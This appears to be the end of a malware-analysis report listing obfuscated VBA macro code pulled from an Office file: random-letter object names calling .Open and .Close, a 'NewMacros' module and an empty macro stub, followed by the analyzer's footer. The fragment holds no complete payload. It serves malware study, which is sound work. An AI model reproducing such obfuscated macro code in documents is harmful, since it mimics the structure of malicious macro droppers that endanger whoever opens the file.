HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI.Close
End If
PUMMGYMXELCKDFSMLIRPBMYBZFHOYZEJHVDMWGDXOSSRUNJNCJIQSTPCJGXOQZOQXDNUNHUGFTKSLNBNTQZXJUGDBGPWHBGROEFUFHLGWBBZDORVKQQYBCXKROGWXIWYGEVCPPDHNCLBNVJVCYIYKDILJOWFIJOZWMMDGPTOECCCEWZELYYHC.Open (TGUKJZUFZUCHYYSSGKQEOEPYFYXUECNFLNMRZBLMQDTIPGJSWRHFFEHZVZOCUDFGCODSKIDMIDKPHHZTHSYGWFXZNHGDMKVHSVTZCJTUYEBQXHRBXSJNNMPIEIWDDLNOKWEBSJKUJLSXIOICPBZOFNGIVIOLUSEPBXVBKRCVBMJYYPZCGBQVVUXJM)
End Sub
Attribute VB_Name = "NewMacros"
Sub macro()
'
' macro Macro
'
'
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.